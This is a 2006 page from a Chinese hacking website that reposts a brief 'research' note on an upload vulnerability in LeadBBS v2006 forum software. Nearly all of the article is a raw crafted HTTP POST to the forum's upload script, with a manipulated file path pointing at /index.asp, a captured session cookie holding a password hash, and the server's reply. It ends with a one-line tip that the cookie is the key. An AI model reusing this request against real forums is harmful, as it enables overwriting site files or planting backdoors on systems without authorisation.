黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 网管频道 >> 入侵检测 >> 正文
·没有路由密码权限时的鸽08-23·上网安全 Vista自我防范10-11
·让濒临崩溃的Windows XP10-11·有备无患,快速自制救急10-11
·要你好看!Windows看图工10-11·空间赞助网提供不同类型10-11
·讨论net.exe和net1.exe的10-10·让3389远程桌面传输更通10-10
·巧妙入侵渗透赌博站10-10·Aspx空间扫权限工具10-10
·Windows2003最新提权工具10-10·易淘乐提供100M免费全能10-10
·系统开机密码忘了不着急10-09·中意网络提供免费100M免10-09
·与众不同 Windows XP开始10-08·让桌面图标翻跟斗 在XP上10-08
·上海宽元站长资助计划-提10-08·个性化Windows XP的任务10-07
·趣盘提供3G免费网络硬盘10-07·秀山热线提供200MB免费全10-07
·一次艰辛的提权过程10-06·成功入侵IT大卖场的渗透10-06
·mysqlhack- MYSQL利用工10-06·lanker一句话PHP后门客户10-06
·WIXI提供3G免费多媒体网10-06·新人网络提供100M/ftp免10-06
·如何利用QQ带来高流量10-05·UuShare提供免费网络文件10-05
[推荐]LeadBBS v2006 上传漏洞研究
      ★★★★★

LeadBBS v2006 上传漏洞研究

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-4-10 9:22:09
POST /User/uploadFile.asp?submitflag=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=@#$gxgl
Referer: http://webidc.vicp.net/User/uploadFile.asp?submitflag=yes
Host: webidc.vicp.net
Content-Length: 345
Cookie: ASPSESSIONIDQQCDQQAQ=OFNPJGMBGGBDEEOJMLGJEMMC; x86AtBD=0; x86Time=2006%2D3%2D18+18%3A50%3A23; cnzz02=0; rtime=0; ltime=1142679153378; cnzz_eid=56351174-; x86=pass=e10adc3949ba59abbe56e057f20f883e&user=%C2%B7%B9%FD

@#$--gxgl
Content-Disposition: form-data; name="filepath"

/index.asp


HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 18 Mar 2006 11:23:38 GMT
X-Powered-By: ASP.NET
Content-Length: 1484
Content-Type: text/html
Set-Cookie: x86Time=2006%2D3%2D18+19%3A23%3A39; path=/
Cache-control: private


<script language=javascript>
<!--

   function addcontent(tmpstr,GBL_Width,GBL_Height)
   {
       parent.document.LeadBBSFm.Form_FaceUrl.value = tmpstr;
       parent.document.LeadBBSFm.Form_FaceWidth.value = GBL_Width;
       parent.document.LeadBBSFm.Form_FaceHeight.value = GBL_Height;
       parent.document.faceimg.src=tmpstr;
       parent.document.faceimg.width=GBL_Width;
       parent.document.faceimg.height=GBL_Height;
   }

//-->
</script>

<html>
<head>
   
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=gb2312">
   <meta http-equiv="Content-Language" content="zh-cn">
   <META name="description" content="LeadBBS论坛,ASP论坛,计数器,统计系统,dotNet,asp.Net,源代码下载,组件,免费代码,ASP,数据库,SQL,文章,入门,ASP精品屋">
   <title>
         
   </title>
   <link rel="stylesheet" type="text/css" href="../inc/style7.css">
   <style>
   <!--
       .l {FONT-FAMILY: 宋体; FONT-SIZE: 12px;}
       table {WORD-BREAK: break-all;}
   -->
   </style>
</head>

   <script language=javascript>
       function ctlent()
       {
           if(window.event.keyCode==27)
           {window.close();}
       }
   </script>
   <body onkeydown="ctlent();" class=TBBG9>
   
<body bgcolor=#f7f7f7 leftmargin="0" topmargin="0">

   <script language=javascript>
   <!--
   alert("非图像文件,上传错误!");

   //-->
   </script>
   <img src=../images/null.gif width=2 height=5><br> 文件上传成功,要<a href=uploadFile.asp>继续上传请点这里</a>
   <img sc=../images/blank.gif height=6 width=1><br><a href=uploadFile.asp></a>
</body>
</html>


http://XXXX/User/uploadFile.asp?submitflag=yes
Cookie
是关键
文章录入:cainiaowang    责任编辑:cainiaowang 
  • 上一篇文章:

  • 下一篇文章:
  • 【字体:
    Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
    ICP备案:冀06009886